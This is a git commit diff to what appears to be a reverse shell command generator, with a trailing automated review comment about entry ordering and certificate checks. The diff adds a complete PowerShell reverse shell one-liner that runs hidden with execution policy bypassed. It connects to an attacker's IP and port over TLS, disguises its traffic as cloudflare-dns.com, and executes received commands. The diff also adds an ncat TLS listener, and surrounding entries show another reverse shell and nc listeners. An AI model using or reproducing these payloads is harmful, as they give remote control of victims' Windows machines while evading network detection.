Added PowerShell #4 TLS, and ncat TLS listerner
Based on https://github.com/MartinSohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell-DNS-TLS.ps1
This commit is contained in:
parent
cb2d5ae74b
commit
eb673a55f3
@ -169,6 +169,11 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "PowerShell #4 (TLS)",
|
||||
"command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "PowerShell #3 (Base64)",
|
||||
"meta": ["windows"]
|
||||
@ -358,6 +363,7 @@ const rsgData = {
|
||||
listenerCommands: [
|
||||
['nc', 'nc -lvnp {port}'],
|
||||
['ncat', 'ncat -lvnp {port}'],
|
||||
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
||||
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
|
||||
['pwncat', 'python3 -m pwncat -lp {port}'],
|
||||
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
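Review bot: The new entry in the first hunk is named "PowerShell #4 (TLS)" but is inserted ahead of "PowerShell #3 (Base64)", so the numbered entries no longer read in order; either move the object below the #3 entry or drop the ordinal, e.g. `"name": "PowerShell (TLS)"`. The entry also carries no note that its `RemoteCertificateValidationCallback` is `{$true}`, so the `IsEncrypted`/`IsSigned` check that follows only confirms a TLS session exists and does not verify the peer; a one-line comment beside the entry stating that the server certificate is not validated would keep that visible to whoever maintains the list. The `['ncat (TLS)', ...]` listener in the second hunk is the counterpart of this entry, but nothing in the data ties the two together; a comment naming the matching client entry at each side would help. Both hunks sit inside object literals whose start and end lie outside the hunks.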
|
||||
|